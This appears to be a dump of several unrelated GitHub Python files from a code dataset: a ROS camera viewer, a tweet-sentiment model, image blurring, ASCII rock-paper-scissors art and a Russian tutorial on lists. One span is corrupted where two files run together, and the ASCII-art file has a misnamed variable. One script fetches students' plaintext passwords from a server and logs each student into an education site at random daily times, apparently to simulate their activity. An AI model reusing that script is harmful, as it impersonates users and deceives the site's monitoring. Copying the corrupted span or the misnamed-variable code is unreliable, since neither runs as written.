self.image_sub = rospy.Subscriber(topic, Image, self.callback)\n self.camera = camera\n\n def callback(self, data):\n try:\n cv_image = self.bridge.imgmsg_to_cv2(data, data.encoding)\n except CvBridgeError as e:\n print(e)\n self.camera.TagImageFrame = cv_image\n\n\nclass TagDetectionListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.tag_sub = rospy.Subscriber(topic, AprilTagDetectionArray,\n self.callback)\n self.camera = camera\n\n def callback(self, data):\n self.camera.tag_detections = data\n #for detection in data.detections:\n #print(detection.id[0])\n #print(detection.pose.pose.pose.position)\n\n\nclass CameraInfoListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.tag_sub = rospy.Subscriber(topic, CameraInfo, self.callback)\n self.camera = camera\n\n def callback(self, data):\n self.camera.intrinsic_matrix = np.reshape(data.K, (3, 3))\n #print(self.camera.intrinsic_matrix)\n\n\nclass DepthListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(topic, Image, self.callback)\n self.camera = camera\n\n def callback(self, data):\n try:\n cv_depth = self.bridge.imgmsg_to_cv2(data, data.encoding)\n #cv_depth = cv2.rotate(cv_depth, cv2.ROTATE_180)\n except CvBridgeError as e:\n print(e)\n self.camera.DepthFrameRaw = cv_depth\n #self.camera.DepthFrameRaw = self.camera.DepthFrameRaw/2\n self.camera.ColorizeDepthFrame()\n\n\nclass VideoThread(QThread):\n updateFrame = pyqtSignal(QImage, QImage, QImage, QImage, QImage)\n\n def __init__(self, camera, parent=None):\n QThread.__init__(self, parent=parent)\n self.camera = camera\n image_topic = \"/camera/color/image_raw\"\n depth_topic = \"/camera/aligned_depth_to_color/image_raw\"\n camera_info_topic = \"/camera/color/camera_info\"\n tag_image_topic = \"/tag_detections_image\"\n tag_detection_topic = \"/tag_detections\"\n image_listener = ImageListener(image_topic, self.camera)\n depth_listener = DepthListener(depth_topic, self.camera)\n tag_image_listener = TagImageListener(tag_image_topic, self.camera)\n camera_info_listener = CameraInfoListener(camera_info_topic,\n self.camera)\n tag_detection_listener = TagDetectionListener(tag_detection_topic,\n self.camera)\n\n def run(self):\n if __name__ == '__main__':\n cv2.namedWindow(\"Image window\", cv2.WINDOW_NORMAL)\n cv2.namedWindow(\"Depth window\", cv2.WINDOW_NORMAL)\n cv2.namedWindow(\"Tag window\", cv2.WINDOW_NORMAL)\n cv2.namedWindow(\"Grid window\", cv2.WINDOW_NORMAL)\n time.sleep(0.5)\n while True:\n rgb_frame = self.camera.convertQtVideoFrame()\n depth_frame = self.camera.convertQtDepthFrame()\n tag_frame = self.camera.convertQtTagImageFrame()\n self.camera.projectGridInRGBImage()\n grid_frame = self.camera.convertQtGridFrame()\n self.camera.BlockDetection()\n detection_frame = self.camera.convertQtDetectionFrame()\n if ((rgb_frame != None) & (depth_frame != None)):\n self.updateFrame.emit(\n rgb_frame, depth_frame, tag_frame, grid_frame, detection_frame)\n time.sleep(0.03)\n if __name__ == '__main__':\n cv2.imshow(\n \"Image window\",\n cv2.cvtColor(self.camera.VideoFrame, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"Depth window\", self.camera.DepthFrameRGB)\n cv2.imshow(\n \"Tag window\",\n cv2.cvtColor(self.camera.TagImageFrame, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"Grid window\",\n cv2.cvtColor(self.camera.GridFrame, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"Detection window\",\n cv2.cvtColor(self.camera.DetectionFrame, cv2.COLOR_RGB2BGR))\n cv2.waitKey(3)\n time.sleep(0.03)\n\n\nif __name__ == '__main__':\n camera = Camera()\n videoThread = VideoThread(camera)\n videoThread.start()\n rospy.init_node('realsense_viewer', anonymous=True)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n","repo_name":"joek5555/armlab-w-23","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":17303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18529368936","text":"import tqdm\nfrom collections import defaultdict\nimport keras\nimport sklearn.utils.class_weight\nimport numpy as np\nimport pandas as pd\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Bidirectional\nfrom keras.layers import Embedding\nfrom keras.layers import LSTM\nfrom keras.layers import SpatialDropout1D\nfrom keras.layers import GlobalAveragePooling1D\nfrom keras.layers import Activation\nfrom keras.layers import Conv1D\nfrom keras.callbacks import Callback\nfrom keras.utils.np_utils import to_categorical\nfrom sklearn.metrics import f1_score, recall_score, precision_score\nimport re\nfrom keras import backend as K\nimport os\n\n\nscript_dirpath = os.path.dirname(os.path.abspath(__file__))\nTRAIN_CSV_FILEPATH = os.path.join(script_dirpath, r'data\\train.csv')\nTEST_CSV_FILEPATH = os.path.join(script_dirpath, r'data\\test.csv')\nTEST_CSV_FILEPATH_OUT = os.path.join(script_dirpath, r'data\\test_out.csv')\nMODEL_FILEPATH = os.path.join(script_dirpath, r'model.h5')\nVOCAB_SIZE = 10000\nBATCH_SIZE = 64\n\n\ndef hashtag_split_func(x):\n return \" \".join([a for a in re.split(r'([A-Z][a-z]+)', x.group(1)) if a])\n\n\n# string manipulation that removes links, breaks hashtags lower case etc\ndef preprocess_data(data_raw):\n data = data_raw\n # split hashtags\n data[:, 1] = np.vectorize(lambda x: re.sub(r'[#|@](\\w+)', hashtag_split_func, x))(data[:, 1])\n # make lower case\n data[:, 1] = np.vectorize(lambda x: x.lower())(data[:, 1])\n # remove links\n data[:, 1] = np.vectorize(lambda x: re.sub(r'http\\S+', '', x))(data[:, 1])\n data[:, 1] = np.vectorize(lambda x: re.sub(r'\\S+://\\S+', '', x))(data[:, 1])\n # remove non alpha-numeric and space-like\n data[:, 1] = np.vectorize(lambda x: re.sub(r'[^0-9a-zA-Z\\s\\']', '', x))(data[:, 1])\n # replace space-like with spaces\n data[:, 1] = np.vectorize(lambda x: re.sub(r'[\\s]+', ' ', x))(data[:, 1])\n # remove start and end single quotes\n data[:, 1] = np.vectorize(lambda x: re.sub(r'(^|\\s)\\'?([\\w\\']+\\w+)\\'?', r'\\1\\2', x))(data[:, 1])\n # strip\n data[:, 1] = np.vectorize(lambda x: x.strip())(data[:, 1])\n\n # remove empty text rows, commented because of the test CSV filling requirement\n # data = data[np.vectorize(lambda x: len(x) > 0)(data[:, 1]), :]\n return data\n\n\n# used to print F1 recall and precision while training, not used for early stop\nclass Metrics(Callback):\n def on_epoch_end(self, batch, logs={}):\n predict = np.argmax(np.asarray(self.model.predict(self.validation_data[0])), axis=1)\n targ = np.argmax(self.validation_data[1], axis=1)\n print('val_f1 %.3f' % f1_score(targ, predict))\n print('val_recall %.3f' % recall_score(targ, predict))\n print('val_precision %.3f' % precision_score(targ, predict))\n return\n\n\n# loads the trained network, loads test csv, predict label and saves csv file with predicted labels\ndef predict_test(tokenizer, max_words_in_tweets):\n csv = pd.read_csv(TEST_CSV_FILEPATH)\n test_data_raw = csv.values\n test_data = preprocess_data(test_data_raw)\n X_test = tokenizer.texts_to_sequences(test_data[:, 1])\n X_test = pad_sequences(X_test, max_words_in_tweets)\n model = keras.models.load_model(MODEL_FILEPATH)\n predictions_categorical = model.predict(X_test)\n predictions = np.argmax(predictions_categorical, axis=1)\n csv['label'] = predictions\n csv.to_csv(TEST_CSV_FILEPATH_OUT)\n\n\ndef build_model(input_length):\n # TODO: use glove embedding\n # TODO: pretrain the net as a LM\n model = Sequential()\n model.add(Embedding(VOCAB_SIZE, 300, input_length=input_length))\n model.add(SpatialDropout1D(0.5))\n # model.add(LSTM(100, dropout=0.3, recurrent_dropout=0.3))\n # model.add(Dense(2, activation='softmax'))\n\n model.add(Bidirectional(LSTM(200, return_sequences=True, dropout=0.5, recurrent_dropout=0.5)))\n model.add(LSTM(200, return_sequences=True, dropout=0.5, recurrent_dropout=0.5))\n model.add(Conv1D(filters=2, kernel_size=1, activation='relu'))\n model.add(GlobalAveragePooling1D())\n model.add(Activation(activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n return model\n\n\n# prints the n most significant words, scored by the word's contribution to the 1 probability minus\n# the contribution to the 0 probability, just before the GAP layer is done.\ndef get_significant_words(X, tokenizer, n=100):\n model = keras.models.load_model(MODEL_FILEPATH)\n word_to_score = defaultdict(list)\n post_conv1d_func = K.function([model.input, K.learning_phase()], [model.layers[-3].output])\n # inverse tokenizer words dictionary, now maps index -> word\n ind_to_word = {index: word for word, index in tokenizer.word_index.items()}\n # this is the padding \\ out of vocabulary word\n ind_to_word[0] = 'N/A'\n for t in tqdm.tqdm(range(X.shape[0] // BATCH_SIZE)):\n start = t * BATCH_SIZE\n end = min((t + 1) * BATCH_SIZE, X.shape[0])\n seqs = X[start:end, :]\n # the output is shape is timesteps x 2\n out = post_conv1d_func([seqs, 0.0])[0]\n # the word's score is the contribution to the 1 probability minus the contribution to 0\n scores = out[:, :, 1] - out[:, :, 0]\n for i in range(seqs.shape[0]):\n for j in range(seqs.shape[1]):\n word = ind_to_word[seqs[i, j]]\n word_to_score[word].append(scores[i, j])\n word_to_avg_score = {word: np.mean(score_list) for word, score_list in word_to_score.items()}\n # sorts the words by their average scores, high score means big contribution\n sorted_word_avg_score = sorted(word_to_avg_score.items(), key=lambda x: x[1])\n return sorted_word_avg_score[-n:]\n\n\ndef main():\n train_val_data_raw = pd.read_csv(TRAIN_CSV_FILEPATH).values\n train_val_data = preprocess_data(train_val_data_raw)\n\n print('Negatives: %d' % train_val_data[train_val_data[:, 2] == 0].size)\n print('Positives: %d' % train_val_data[train_val_data[:, 2] == 1].size)\n print('Baseline accuracy: %.3f' % (train_val_data[train_val_data[:, 2] == 0].size / train_val_data.size))\n\n tokenizer = Tokenizer(num_words=VOCAB_SIZE, split=' ')\n tokenizer.fit_on_texts(train_val_data[:, 1])\n\n X = tokenizer.texts_to_sequences(train_val_data[:, 1])\n X = pad_sequences(X)\n Y = to_categorical(train_val_data[:, 2])\n sequence_words_amount = X.shape[1]\n\n model = build_model(sequence_words_amount)\n # class_weight used to balance type I and type II errors due to imbalanced dataset\n class_weight = sklearn.utils.class_weight.compute_class_weight('balanced',\n np.unique(train_val_data[:, 2]),\n train_val_data[:, 2])\n callbacks = [EarlyStopping(patience=2),\n ModelCheckpoint(MODEL_FILEPATH, save_best_only=True),\n Metrics()]\n model.fit(X, Y,\n validation_split=0.25,\n epochs=50,\n batch_size=BATCH_SIZE,\n callbacks=callbacks,\n class_weight=class_weight)\n predict_test(tokenizer, sequence_words_amount)\n print(get_significant_words(X, tokenizer))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"David-Taub/TweetsSentimentAnalysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42290235863","text":"for _ in range(int(input())):\n s = input()\n l = len(s)\n\n one=-1;zero=-1\n for i in range(l):\n if s[i]=='0' and zero==-1:\n zero=i\n if s[i]=='1' and one==-1:\n one=i\n\n if one==-1:\n print('0'*(2*l))\n elif zero==-1:\n print('1'*(2*l))\n elif one 1 增加一圈\n# filter size= 5-> 2 增加二圈 以此類推\n\nimg_len,img_width,img_channels=img.shape\n\ny=np.zeros([img_len+(extend_size*2),img_width+(extend_size*2),img_channels],dtype=\"uint8\") #增加兩圈 陣列上下左右增加2倍\n\nfor channel in range(img_channels):\n for i in range(extend_size,img_len+extend_size):\n for j in range(extend_size,img_width+extend_size): # 把圖片放進四周圍pixel值為0中\n y[i][j][channel]=img[i-extend_size][j-extend_size][channel]\n\n\n#卷積運算\ndef average_blur(img,filter_size):\n img_len,img_width,img_channels=img.shape\n convolution=np.ones([filter_size,filter_size,img_channels])\n for channel in range(img_channels):\n for i in range(img_len):\n for j in range(img_width):\n temp=0\n for filter_X in range(filter_size):\n for filter_Y in range(filter_size):\n temp=temp+y[i+filter_X][j+filter_Y][channel]*convolution[filter_X][filter_Y][channel]\n img[i][j][channel]=round(temp/(filter_size*filter_size))\n\n signature=cv2.imread(\"C:/Users/user/Desktop/imageprocess/HW1/signature_me.png\")\n signature_x,signature_y,signature_channels=signature.shape\n for channel in range(signature_channels):\n for i in range(signature_x):\n for j in range(signature_y):\n if signature[i][j][channel]==0:#如果簽名檔為黑 則self_blur同位置也是黑的\n img[i][j][channel]=0\n cv2.imshow(\"self_average_blur\",img)\n cv2.waitKey()\n\n#找中位數\ndef median_blur(img,filter_size):\n img_len,img_width,img_channels=img.shape\n for channel in range(img_channels):\n for i in range(img_len):\n for j in range(img_width):\n temp=[]\n for filter_X in range(filter_size):\n for filter_Y in range(filter_size):\n temp.append(y[i+filter_X][j+filter_Y][channel])\n temp.sort() #把filter內的數字排列之後\n half=int(len(temp)/2)#找index一半的元素\n img[i][j][channel]=temp[half]\n\n signature=cv2.imread(\"C:/Users/user/Desktop/imageprocess/HW1/signature_me.png\")\n signature_x,signature_y,signature_channels=signature.shape\n for channel in range(signature_channels):\n for i in range(signature_x):\n for j in range(signature_y):\n if signature[i][j][channel]==0:#如果簽名檔為黑 則self_blur同位置也是黑的\n img[i][j][channel]=0\n cv2.imshow(\"self_median_blur\",img)\n cv2.waitKey()\n\ndef gaussian_blur(img,filter_size):\n\n blur = cv2.GaussianBlur(img, (filter_size, filter_size),0)\n signature=cv2.imread(\"C:/Users/user/Desktop/imageprocess/HW1/signature_me.png\")\n signature_x,signature_y,signature_channels=signature.shape\n for channel in range(signature_channels):\n for i in range(signature_x):\n for j in range(signature_y):\n if signature[i][j][channel]==0:#如果簽名檔為黑 則self_blur同位置也是黑的\n img[i][j][channel]=0\n cv2.imshow(\"gaussian_blur\",img)\n cv2.waitKey()\n\n\n\naverage_blur(img,filter_size)\nmedian_blur(img,filter_size)\ngaussian_blur(img,filter_size)","repo_name":"d0641798/image-process","sub_path":"HW1/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21525727659","text":"import csv\n\n\ndef main():\n with open('some.csv', 'r', newline='') as f:\n reader = csv.reader(f)\n next(reader) # pass the first line\n for row in reader:\n print(row)\n\n\nif __name__ == '__main__':\n main()\n\n# https://stackoverflow.com/questions/11349333/when-processing-csv-data-how-do-i-ignore-the-first-line-of-data\n","repo_name":"binderclip/code-snippets-python","sub_path":"builtin_packages/csv_sp/reader_sp.py","file_name":"reader_sp.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"21182088311","text":"\"\"\"\nExample sim_f for simple heFFTe use case.\n\"\"\"\nimport subprocess\n\nimport numpy as np\n\n\ndef call_and_process_heffte(H, persis_info, sim_specs, _):\n \"\"\"\n Evaluates (via subprocess) a string that includes a call to a heFFTe\n executable as well as other arguments. Afterwards, the stdout is parsed to\n collect the run time (as reported by heFTTe)\n \"\"\"\n\n H_o = np.zeros(1, dtype=sim_specs[\"out\"])\n\n p = subprocess.run(H[\"exec_and_args\"][0].split(\" \"), cwd=\"./\", stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n assert p.returncode == 0, \"heFFTe call has failed\"\n\n time = float(p.stdout.decode().split(\"Time per run: \")[1].split(\" \")[0])\n\n H_o[\"RUN_TIME\"] = time\n return H_o, persis_info\n","repo_name":"Libensemble/libensemble","sub_path":"libensemble/sim_funcs/heffte.py","file_name":"heffte.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"72540490961","text":"from rock_paper_scissors.constants import PAPER, ROCK, SCISSORS\n\n# Rock\nrock_art = (\" ___ \\n\"\n \"---' __) \\n\"\n \" (___) \\n\"\n \" (___) \\n\"\n \" (__) \\n\"\n \"---._(__) \")\n# Paper\npaper_art = (\" ___ \\n\"\n \"---' _)_ \\n\"\n \" __) \\n\"\n \" ___) \\n\"\n \" ___) \\n\"\n \"---.____) \")\n# Scissors\nscissorss_art = (\" ___ \\n\"\n \"---' _)_ \\n\"\n \" __) \\n\"\n \" ____) \\n\"\n \" (__) \\n\"\n \"---._(__) \")\n\nhand_name_to_ascii_art = {ROCK: rock_art, PAPER: paper_art, SCISSORS: scissors_art}\n\n\ndef reverse_hand(hand_ascii):\n new_lines = []\n for line in hand_ascii.split(\"\\n\"):\n\n new_line = line[::-1]\n new_line = new_line.replace(\"(\", \")\")\n new_line = new_line.replace(\")\", \"(\")\n new_lines.append(new_line)\n reversed_hand = \"\\n\".join(new_lines)\n return reversed_hand\n\n\ndef plot_round_graphics(player1, player2):\n hand1_art = hand_name_to_ascii_art[player1.currently_played_hand.hand_type]\n hand2_art = hand_name_to_ascii_art[player2.currently_played_hand.hand_type]\n hand2_art = reverse_hand(hand2_art)\n round_plot = player1.player_name + \" \" * 32 + player2.player_name + \"\\n\"\n for line1, line2 in zip(hand1_art.split(\"\\n\"), hand2_art.split(\"\\n\")):\n round_line = line1 + \" \" * 12 + line2 + \"\\n\"\n round_plot += round_line\n return round_plot\n","repo_name":"zaza-dh/rock_paper_scissors_example","sub_path":"rock_paper_scissors/graphical_helpers.py","file_name":"graphical_helpers.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33474000271","text":"#!/usr/bin/python3\nimport schedule\nimport time\nimport requests\nimport socket\nimport rsa\nimport base64\nimport random\nimport json\nimport os\nimport sys\n\nos.environ[\"REQUESTS_CA_BUNDLE\"] = os.path.join(os.path.dirname(sys.argv[0]), 'cacert.pem')\n\nyongdao_url = \"https://we.chinaedu.net/volbeacon\"\napi_url = \"http://39.105.22.135:8000\"\ntask_dict = {}\n# 任务列表,保存每天的登录任务\njob_list = []\n\ndef _str2key(s):\n # 对字符串解码\n b_str = base64.b64decode(s)\n\n if len(b_str) < 162:\n return False\n\n hex_str = ''\n\n # 按位转换成16进制\n for x in b_str:\n h = hex(x)[2:]\n h = h.rjust(2, '0')\n hex_str += h\n\n # 找到模数和指数的开头结束位置\n m_start = 29 * 2\n e_start = 159 * 2\n m_len = 128 * 2\n e_len = 3 * 2\n\n modulus = hex_str[m_start:m_start + m_len]\n exponent = hex_str[e_start:e_start + e_len]\n\n return modulus, exponent\n\n\n# 加密\ndef rsa_encrypt(s, pubkey_str):\n key = _str2key(pubkey_str)\n modulus = int(key[0], 16)\n exponent = int(key[1], 16)\n pubkey = rsa.PublicKey(modulus, exponent)\n return base64.b64encode(rsa.encrypt(s.encode(), pubkey)).decode()\n\n\n# 登录\ndef login(login_id, password_encryption, user_name):\n url = \"/login/login.do?execute=1\"\n data = {\n \"loginType\": (None, 1),\n \"type\": (None, 1),\n \"administrativeCode\": (None, 210200),\n \"ip\": (None, ip),\n \"cityName\": (None, \"辽宁省大连市\"),\n \"abc\": (None, user_name),\n \"loginId\": (None, login_id),\n \"passwordEncryption\": (None, password_encryption)\n }\n res = requests.post(yongdao_url + url, files=data)\n if res.status_code == 200:\n print(user_name + \" 登录成功!\")\n\n\n# 获取公钥\ndef login_encrypt(task_time):\n url = \"/common/loginEncrypt.do\"\n res = requests.post(yongdao_url + url)\n public_rsa_key = res.json()['publicRSAKey']\n login_id = res.json()['loginId']\n user = task_dict[task_time]\n password_encryption = rsa_encrypt(user[\"password\"], public_rsa_key)\n # print(user[\"password\"])\n user_name = user[\"studentName\"]\n login(login_id, password_encryption, user_name)\n\n\n# 获取ip\nhostname = socket.gethostname()\nip = socket.gethostbyname(hostname)\n\n\n# 随机时间\ndef round_time():\n h = random.randint(10, 11)\n m = random.randint(0, 59)\n task_time = str(h).zfill(2) + \":\" + str(m).zfill(2)\n return task_time\n\n\n# 取消前一日的定时任务\ndef cancel_job():\n for job in job_list:\n schedule.cancel_job(job)\n job_list.clear()\n\ndef getCurrentDay():\n return time.strftime(\"%Y-%m-%d\", time.localtime())\n\n\n# 初始化任务\ndef init_job():\n cancel_job()\n task_dict.clear()\n # user_list = json.load(open(\"./user-config.json\"))\n user_list = json.loads(requests.get(api_url + \"/student/list\").text)\n # 任务字典 key未执行任务的时间点,value未登录用户信息{user_name: String, password: String}\n for user in user_list:\n task_time = round_time()\n # 去重\n while task_time in task_dict.keys():\n task_time = round_time()\n print(getCurrentDay() + ' ' + task_time + \" 登录用户\" + user[\"studentName\"])\n task_dict[task_time] = user\n job = schedule.every().day.at(task_time).do(login_encrypt, task_time)\n job_list.append(job)\n # print(task_dict, job_list)\n\n\ninit_job()\n# schedule.every().day.at(\"00:01\").do(init_job)\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n\n","repo_name":"Pr0mi5e/python2smb","sub_path":"script/login-yongdao.py","file_name":"login-yongdao.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8014882632","text":"'''\nfrom pprint import pprint\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\nresp = session.get(f'http://dveriross.ru/mezhkomnatnye-dveri')\n\ntitle = str(resp.html.xpach('//title/text()'))\ndescription = resp.html.xpach('//meta[@name=\"description\"]')\ndescription = str(description).split('')\nh1 = resp.html.xpach('//h1/text()')\n\nprint('title: ' + title)\nprint('description: ' + description)\nprint('h1: ' + h1)\n'''\n\n\n######### list: ##########\n\n\nvar = ['wdwdwdwdwdwd', '1312414214214214214', [1,2,3,5,5, ['w','w',3,5,'6f','eff','et34t4rg','dgf422rf','3r'], 'wfw', 'ww'],'wd']\n\nprint(var[2][4]) #Внутри 2го списка 4й элемент\n#5\nprint(var[0][4])\n#'w'\nprint(var[3])\n#'wd'\nprint(var[1])\n#'1312414214214214214'\nprint(var[2])\n#[1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww']\nprint(var[2][5])\n#['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r']\nprint(var[2][5][2])\n#3\n\n\nvar.append('qwerty') # добавляет элемент в конец списка. прелбразует существующий список\nvar.clear # очистка списка\na = var.copy() # создаст физически другую копию списка. У каждой копии свой ID\nbar = var # создаст копию списка. У каждой копии единый ID\ntar = bar # при изменении одного списка остальные тоже меняются\nvar.count() # считает количество вхождений (не считает во вложенных списках)\nvar.split() # разбивает строки на списки слов\nvar.split\ns = 'список доменов, список урл, список ключевых слов, список html страниц'\nprint(s.split())\n# ['список', 'доменов,', 'список', 'урл,', 'список', 'ключевых', 'слов,', 'список', 'html', 'страниц']\nprint(s.split().count('урл,'))\n# 1\ns.replace(',', '').upper() # замена\n'СПИСОК ДОМЕНОВ СПИСОК УРЛ СПИСОК КЛЮЧЕВЫХ СЛОВ СПИСОК HTML СТРАНИЦ'\nvar.index('1312414214214214214')\n#1\nvar[2]\n# '1312414214214214214'\nlen(var) # длина любого итерируемого списка\n#4\nvar.insert(1, 555) # добавляет элемент со сдвигом остальных\n# ['wdwdwdwdwdwd', 555, '1312414214214214214', [1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww'], 'wd']\nvar.append(444) # добавляет элемент в конец списка\n# ['wdwdwdwdwdwd', 555, '1312414214214214214', [1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww'], 'wd', 444]\n555 in var # проверяет наличие чего-то внутри чего-то\n# true\nvar.pop # возвращает последний элемент списка, удаляя его из списка\n# 444\n# ['wdwdwdwdwdwd', 555, '1312414214214214214', [1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww'], 'wd']\nremove # удалаяет элэмент из списка\nvar.reverse() # переворачивает список, не меняя ID\nvar = var[::-1] # переворачивает список меняя ID\nlist('123456') # разбивает строку на список\n# ['1', '2', '3', '4', '5', '6']\n'123234235232'.split('2') # разбивает строку на список по символу\n# ['1', '3', '34', '35', '3', '']\nr = [2, 4 ,5 ,65, 34, 345, 2, 6, 6, 7 ,9]\nr.sort() #сортирует список\n# [2, 2, 4, 5, 6, 6, 7, 9, 34, 65, 345]\n\n\n###### КОРТЕЖ (tuple) #######\n# неизмняемый тип данных\nkort = var = (123111115, 1312414214214214214, 87, 786,2576)\n# поддеррживаются все методы списков, кроме изменяющих.\n\nkort = list(kort) # для сортировки и изменения данных перегоняем кортеж в список\nkort.sort() # сортируем\n# [87, 786, 2576, 123111115, 1312414214214214214]\nkort = tuple(kort) # и обратно в кортеж\n# (87, 786, 2576, 123111115, 1312414214214214214)\n\n#список в кортеже можно изменять как угодно.\nkort1 = (87, 786, 2576, 123111115,['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 1312414214214214214)\nkort1[4].append('qwerty') # добваляем элемент в конец списка в кортеже\n# (87, 786, 2576, 123111115, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r', 'qwerty'], 1312414214214214214)\n\n######## Распаковка кортежа #######\nkort2 = (0,1,2,3,4)\na, b, c, d, e = kort2\n# a = 0\n# b = 1\n# c = 2\n# d = 3\n# e = 4\n\nt = a, b, c, d, e # запаковка кортежа\n\n###### обмен значений 2х переменных #######\n\na = 100\nb = 200\n\na, b = b, a # создаётся кортеж и переприсваевается\n\n\nrt = 1,2,3,4,5,5685,89,345,14 # бюбой набор переменных, написанных через запятую интерпритатор воспринимает как кортеж\n# (1,2,3,4,5,5685,89,345,14)\n\n####### Множества (set) ########\n# тоже массив, но в него записываются только уникальные значения\n# слайсы ииндексы не работают\nst = {1,2,3,4,5,45}\n# .append не работает здесь\n # {1,2,3,4,5,10,45}\n\nst.add((1,2,6)) # можно добавить внутрь кортеж, но не список\n# {1, 2, 3, 4, 5, 45, (1, 2, 6)}\n\nhash(123) # конвертирует в ХЕШ. Множества работают по хешам и очень быстро\n\nbr = {1,2,3}\n\nst - br # вычитание множеств. Складывать нельзя (+)\n# {45, 4, 5, (1, 2, 6)}\n\nst.union(br)\n# {1, 2, 3, 4, 5, 45, (1, 2, 6)}\n\n# Методы множеств возвращают копии объекта, не меняя сам объект. Объекты остаются неизменными.\n\nst.difference(br) # То же, что и (-)\n\nst.difference_update(br) # То же, что и (-), но сохраняет изменения в объекте\n\nst.discart(br) # ???\n\nst.intersection(br) # пересечения множеств\n# {1, 2, 3}\n\n","repo_name":"PlanckConstant/for-SEO","sub_path":"First_pars.py","file_name":"First_pars.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71204818962","text":"import os\nfrom difflib import SequenceMatcher\nfrom pathlib import Path\nfrom geopy.geocoders import Nominatim\nfrom collections import Counter\n\n# Used for printing bold in console output\ndef bold(s):\n return('\\033[1m' + s + '\\033[0m')\n\nreplace_special_char = {\n \"é\":\"e\",\n \"è\":\"e\",\n \"ü\":\"ue\",\n \"ä\":\"ae\",\n \"ö\":\"oe\",\n \"í\":\"i\",\n \"ó\":\"o\",\n \"ç\":\"c\",\n \"á\":\"a\",\n \"'\":\" \",\n \"â\":\"a\",\n \"š\":\"s\",\n \"ť\":\"t\",\n \"ñ\":\"n\",\n \"ř\":\"r\",\n \"ž\":\"z\",\n \"ů\":\"u\",\n \"ý\":\"y\",\n \"ě\":\"e\",\n \"ň\":\"n\",\n \"ã\":\"a\",\n \"ê\":\"e\",\n \"č\":\"c\",\n \"ô\":\"o\",\n \"ı\":\"i\",\n \"ú\":\"u\",\n \"ś\":\"s\",\n \"ą\":\"q\",\n \"à\":\"a\",\n \"å\":\"a\",\n \"ł\":\"l\",\n \"-\":\" \",\n \"î\":\"i\",\n \"ŕ\":\"r\",\n \"ľ\":\"l\",\n \"ď\":\"d\",\n \"ć\": \"c\",\n \"ș\": \"s\",\n}\n\n# Compare strings without considering special characters and caps\ndef clean_string(s):\n s = s.lower()\n for c in replace_special_char:\n s = s.replace(c, replace_special_char[c])\n return s\n\n# Read in files containing simple lists, dictionaries or geoLocationRules\ndef read_local_file(file_name):\n path_file_name = path_to_config_files + file_name\n\n with open(path_file_name) as myfile:\n file_content = myfile.readlines()\n\n list_format = [accepted_additions_file]\n\n if file_name in list_format: # simple list\n return [line.strip() for line in file_content[1:]]\n\n abbreviations_format = [abbreviations_file]\n\n if file_name in abbreviations_format: # dictionary, keys seperated from content with tabs\n content = {}\n for line in file_content:\n if line == \"\\n\":\n continue\n if line.startswith(\"#\"):\n key = line.strip().split(\"# \")[1]\n content[key] = {}\n continue\n l = line.strip().split(\"\\t\")\n if l[0] in content[key]:\n print(\"Attention, duplicate found while reading \" + file_name + \": \" + l[0] + \" -> \" + l[1] + \", \" + content[key][l[0]])\n content[key][l[0]] = l[1]\n return content\n\n geoLocationRule_format = [geoLocationRules_file, manualAnnotationRules_file, internationalExceptions_file]\n\n if file_name in geoLocationRule_format: # Read as simple dictionary\n content = {}\n for line in file_content:\n if line == \"\\n\":\n continue\n l = line.strip().split(\"\\t\")\n k = l[0]\n c = l[1]\n if k in content:\n print(\"Attention, duplicate found while reading \" + file_name + \": \" + k + \" -> \" + c + \", \" + content[k])\n content[k] = c\n return content\n\n# Read ordering file into simple dictionary based on type (e.g. location, division, pango_lineage)\ndef read_ordering(path):\n with open(path + 